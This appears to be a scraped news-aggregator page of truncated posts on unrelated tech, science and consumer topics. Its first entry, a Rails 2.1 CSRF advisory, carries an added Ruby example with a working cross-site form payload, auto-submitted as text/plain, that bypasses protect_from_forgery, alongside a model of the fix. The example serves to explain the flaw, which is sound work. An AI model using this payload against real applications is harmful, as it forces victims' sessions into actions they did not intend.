michael: Potential Circumvention of CSRF Protection in Rails 2.1 (4)
by Michael (71) on Planet RubyOnRails (1), 2 weeks ago
There is a bug in all 2.1.x versions of Ruby on Rails which weakens the CSRF protection provided by protect_from_forgery. By design, Rails does not perform token verification on requests whose content type is one that browsers do not normally generate. Unfortunately that list also included 'text/plain', which browsers can generate (an HTML form with enctype="text/plain" submits with exactly that content type). Impact: requests can be crafted which circumvent the CSRF protection entirely. Rails does not parse the parameters provided with these ...
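As an added example (not code from the advisory or from Rails itself), the following Ruby models the protect_from_forgery decision described above, the cross-site form a browser will submit as text/plain, and the narrowed exemption list that closes the hole. The two exempt content-type lists, the host name, the token value and the request hashes are all constructed for illustration; Rails expresses the same decision inside its own verified_request? method, and the exact exempt list of the time is not reproduced here.

```ruby
require 'uri'

# Content types that protect_from_forgery exempted from token verification.
# Both lists are ASSUMED for this example; the advisory only says the 2.1.x
# list included text/plain and that the rest are types browsers do not
# normally send.
EXEMPT_VULNERABLE = ['text/plain', 'application/xml', 'application/json'].freeze
EXEMPT_FIXED      = ['application/xml', 'application/json'].freeze

# Builds the attacker's page (constructed). Loaded by a logged-in victim, it
# auto-submits a cross-origin POST whose Content-Type is text/plain. The real
# parameters ride in the action URL's query string, because Rails does not
# parse a text/plain body as parameters.
def forged_page(target_url, params)
  query = URI.encode_www_form(params)
  <<~HTML
    <form id="f" method="POST" enctype="text/plain" action="#{target_url}?#{query}">
      <input name="x" value="ignored">
    </form>
    <script>document.getElementById('f').submit()</script>
  HTML
end

# The request the victim's Rails app receives from that form (constructed).
FORGED_REQUEST = {
  method: :post,
  content_type: 'text/plain',
  query_string: 'title=pwned&body=spam',
  body: "x=ignored\r\n",
}.freeze

# A normal same-site form post carrying the session's token (constructed).
LEGIT_REQUEST = {
  method: :post,
  content_type: 'application/x-www-form-urlencoded',
  query_string: '',
  body: 'title=hello&authenticity_token=tok123',
}.freeze

SESSION_TOKEN = 'tok123' # constructed stand-in for form_authenticity_token

# Query-string parameters are parsed for every request; the body is parsed
# here only for form-encoded posts. (Rails also parses XML/JSON bodies, which
# does not change the outcome for text/plain.)
def request_params(req)
  params = URI.decode_www_form(req[:query_string].to_s).to_h
  if req[:content_type] == 'application/x-www-form-urlencoded'
    params.merge!(URI.decode_www_form(req[:body].to_s).to_h)
  end
  params
end

# Model of the 2.1.x decision: GET and exempt content types skip the check;
# everything else must carry the session's authenticity_token.
def verified_request?(req, session_token, exempt)
  return true if req[:method] == :get
  return true if exempt.include?(req[:content_type])
  request_params(req)['authenticity_token'] == session_token
end

# Returns the params the controller action would see, or :rejected where
# Rails would raise ActionController::InvalidAuthenticityToken.
def dispatch(req, session_token, exempt)
  return :rejected unless verified_request?(req, session_token, exempt)
  request_params(req)
end

if __FILE__ == $PROGRAM_NAME
  puts forged_page('https://victim.example/posts', 'title' => 'pwned', 'body' => 'spam')
  p dispatch(FORGED_REQUEST, SESSION_TOKEN, EXEMPT_VULNERABLE) # params reach the action
  p dispatch(FORGED_REQUEST, SESSION_TOKEN, EXEMPT_FIXED)      # :rejected
end
```

With the vulnerable list, the forged request reaches the action with the attacker's title and body even though no token is present anywhere; with text/plain removed from the exemptions, the same request is rejected while the legitimate token-bearing form still works. The remaining exemptions rest on the assumption that a browser cannot send those content types cross-site from a plain form, and enctype="text/plain" is the reminder that such assumptions must be checked against what HTML actually lets a page do.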
Potential Circumvention of CSRF Protection in Rails 2.1 (7)
by Michael (71) on Riding Rails - home (9), 2 weeks ago (same advisory as above)
Anti-Matter Created By Laser At Livermore (25)
by kdawson (121) on Slashdot (267), 2 weeks, 1 day ago
zootropole alerts us to a press release issued today by Lawrence Livermore National Laboratory, announcing the production of 'billions of particles of anti-matter.' "Take a gold sample the size of the head of a push pin, shoot a laser through it, and suddenly more than 100 billion particles of anti-matter appear. The anti-matter, also known as positrons, shoots out of the target in a cone-shaped plasma 'jet.' This new ability to create a large number ...
-
Dylan Bennett said:
These guys don't watch enough sci-fi. Don't they know that antimatter containment failure is like the all-time most common reason for the Enterprise being in jeopardy?!
-
Lee said:
WooT!!!!
Obama confuses Harvard lawyer for tech guy [Julius Genachowski] (2)
by Paul Boutin (7) on Valleywag (48), 3 weeks, 5 days ago
I'm from MIT, so I'm hardwired to hate on Harvard Law grad Julius Genachowski, the so-called technology guy newly named to our Internet President's transition team. His company, LaunchBox, helps Web and mobile entrepreneurs pitch their ideas to get seed funding. That makes him a Paul Graham wannabe to me. He spent eight years working for Barry Diller at IAC as general counsel. Is that a plus or a minus? To be fair, Genachowski is ...
How To Avoid Record-High Bank Fees (1)
by Ben Popken (31) on Consumerist (68), 4 weeks, 1 day ago
Bank fees are increasingly disproportionate to the cost of business they're supposed to cover, as shown in Bankrate's latest annual survey of consumer banking costs.
Average NSF (non-sufficient funds) fee: $28.95, a 2.5% increase from last year
Average ATM surcharge: $1.97, up 1%
Minimum balance required to avoid fees on interest checking accounts at a brick-and-mortar bank: $3,461.84, up 4%
Average minimum required to open an online checking account: $650.81, up $517.48
Fees are designed ...
Focus Design's SBU self-balancing unicycle: because you didn't look dumb enough on a Segway (11)
by Paul Miller (15) on Engadget (496), 1 month, 1 week ago
Filed under: Transportation The world of personal transportation, with few exceptions, has littered the earth with embarrassing paraphernalia. In-line skates, pogo sticks, the recumbent bike -- all disasters to personal style. Mix in electricity and you get the Segway, or alternatively, Focus Design's SBU electric self-balancing unicycle. The SBU can be steered by leaning left to right (like a regular unicycle) and uses Segway-style gyroscopes to power your lazy ass forwards and backwards. Not a ...
Registry Hack to Download & Install Windows Vista Service Pack 2 (SP2) Pre-Beta (1)
by Abdul Aziz (0) on Tech[dot]Blog (0), 1 month, 1 week ago
As a part of the development and testing process, Microsoft is going to start by providing a small group of Technology Adoption Program customers with Windows Vista SP2 Beta for evaluation. Windows Vista SP2 Beta contains previously released fixes focused on addressing specific reliability, performance, and compatibility issues. In addition to previously released updates since the launch of Windows Vista SP1, Windows Vista SP2 contains the following new features: + Adds Windows Search 4.0 for ...
Sample scripts for Ruby 1.9 Symbian (1)
by jrobertson (James Robertson) (0) on DZone Snippets: ruby code (0), 1 month, 1 week ago
Sample scripts for the Ruby 1.9 Symbian release. Source: Symbian Developer Network - Community - Open source projects - Ruby 1.9 [symbian.com]
= test.rb - standard test script from the Ruby 1.9 source distribution (currently 6 of 854 tests fail; all failures are related to restrictions in the current PIPS library implementation)
= hello.rb - basic 'Hello, world!' example
= input.rb - basic character input example (use the # key for CR on the phone's keypad)
= fileex.rb - basic ...
Add Google Calendar and Reader to Your Gmail (57)
by Gina Trapani (165) on Lifehacker: not Windows (0), 1 month, 1 week ago
Firefox with the Greasemonkey extension: Not since Gmail saw its interface overhaul last October has a scripter embedded Google Calendar and Reader into Gmail easily—until now. Two new user scripts integrate both Google Calendar and Google Reader onto the same screen as your email inbox. Here's what it looks like. Click on the thumbnail to see a full screen of both GCal and GReader below my list of draft email messages. There are two drawbacks ...
-
PouarK said:
Already tried it... it's not bad, but you quickly run out of space... so I removed it!
-
John said:
This is awesome in so many ways.
-
EROOM said:
Integrates Google Reader and Calendar
MINI E finally official, 500 available soon for US test drivers (19)
by Paul Miller (15) on Engadget (496), 1 month, 2 weeks ago
Filed under: Transportation The much-anticipated, well-expected MINI E -- the first all-electric MINI -- is headed our way before you know it. BMW's built itself a decent performer, offering 204 hp of electric motor in a setup quite similar to the Tesla. The car boasts a 150 mile range off its 35 kWh lithium-ion battery pack, can hit 62 mph in 8.5 seconds, and does a full charge off of an included high current charging ...
Horrible (13)
on Rands In Repose (0), 1 month, 4 weeks ago
I can turn a phrase. High school journalism is where I discovered this. Mrs. Wickett kept bringing stories to me in my junior year: "Needs a clever headline." I'd read the story and throw out a terse, clever headline. No clue where this ability comes from. If I actually think about how I pick the words and construct the idea, the ability vanishes. The less I know about it, the better. I've been riding this ...
-
Sean O said:
Everywhere I look, I see messages on modeling.
-
Bill O'Neill said:
My horrible that I've been trying to overcome is being social. Sure, I'm social with people I already know. But talking to random strangers? I'd rather balance a dyslexic's checkbook.
-
past said:
"There's a defining moment in your career when you choose to trust someone beside yourself. I'm not talking about trusting them with the small stuff: "Hey, can you fix this bug for me?" I'm talking about big trust: "Hey, your design sense is 10x mine, what the hell is wrong with this dialog? Be brutal." It's tricky to leave that swell little island of you. It's hard to suck up your pride and acknowledge there are those who excel where you suck. But whether you're an individual or a manager, your job is to learn to scale at what makes you great. Yes, you want to fill your professional experience gaps, but if you work where I work, you're in a hurry. Getting anything done requires a balance of your natural talent and your ability to find and leverage the talents of those around you."
-
James Williams (willia4) said:
I've never really sat down and tried to figure out exactly what my "Horrible" is. Maybe I should do that. (Of course, the real trick will be limiting it to fewer than a dozen discrete things...)
iPhone Antitrust and Computer Fraud Claims Upheld (1)
by ScuttleMonkey (23) on Slashdot (267), 2 months ago
LawWatcher writes "On October 1, 2008, a federal judge in California upheld a class action claiming that Apple and AT&T Mobility's five-year exclusive voice and data service provider agreement for the iPhone violates the anti-monopoly provisions of the antitrust laws. The court also ruled that Apple may have violated federal and California criminal computer fraud and abuse statutes by releasing version 1.1.1 of its iPhone operating software when Apple knew that doing so would damage ...
Dell Mini 9 hacked to run OS X (4)
by Nilay Patel (30) on Engadget (496), 2 months ago
Filed under: Laptops We're assuming Apple will eventually give up and release a netbook of its own, but until then Steve had better get used to seeing OS X hacked to run on all manner of tiny laptops -- the latest to make the switch is Dell's Inspiron Mini 9. Nothing too complicated about this hack, since most of the work was already done for the internally-similar MSI Wind, but you'll have to dig up ...
French newspaper says Macs cause cancer [Apple] (2)
by Nicholas Carlson (26) on Valleywag (48), 2 months ago
The Liberation of France says an oft-noticed smell emitted by Apple's Mac Pro desktop computers is caused by a combination of toxins, including benzene, which is known to cause leukemia. The questions now have to be: What did Apple know and when did Apple know it? Posts in Apple support forums, full of Mac Pro owners complaining of the smell, indicate Apple was well aware of how their computers smell. One owner writes, "The guy in ...
Direct public funding of science (1)
by Syam Anand (0) on fundscience.org (0), 2 months ago
Currently, NIH funds the majority of biology research in the USA using taxpayer dollars. The success of the NIH system and the adaptation of the scientific community to NIH have made this system stable and dependable. A significant amount of additional support for biology research, especially health-related research, also comes from foundations. Some of them, such as the Bill & Melinda Gates Foundation and the Howard Hughes Medical Institute, provide substantial financial support far exceeding, and often more attractive ...
VIDEO: Post Implosion, Old WaMu Ad Has New, Dark, Meaning [Washington Mutual] (2)
by Ben Popken (31) on Consumerist (68), 2 months, 1 week ago
Now that Washington Mutual completely imploded on its garbage-pile avalanche of home mortgages, this old WaMu commercial from August 2006 takes on a new, darker meaning... ANNOUNCER: The uncertainty of getting a home loan made Paul irritable. Paul pops a child's balloon. ANNOUNCER: Then he went to Washington Mutual. Thanks to their flexible lending rules, he got quick approval. Now he's always in a GREAT mood. A series of horrible things happen to Paul, but he remains ...
Our Inaugural Post (1)
by David (52) on fundscience.org (0), 2 months, 2 weeks ago
Hello, I'm David Vitrant, the Executive Director of FundScience Inc. Here at FundScience we are looking to get the public to fund individual pilot research projects. This will drive innovation in many scientific fields and open up complex scientific discussions to the public. In the end, research is meant to help us understand nature and to benefit society in general. With our blogs, wikis, forums, and soon project proposals we hope to bring a ...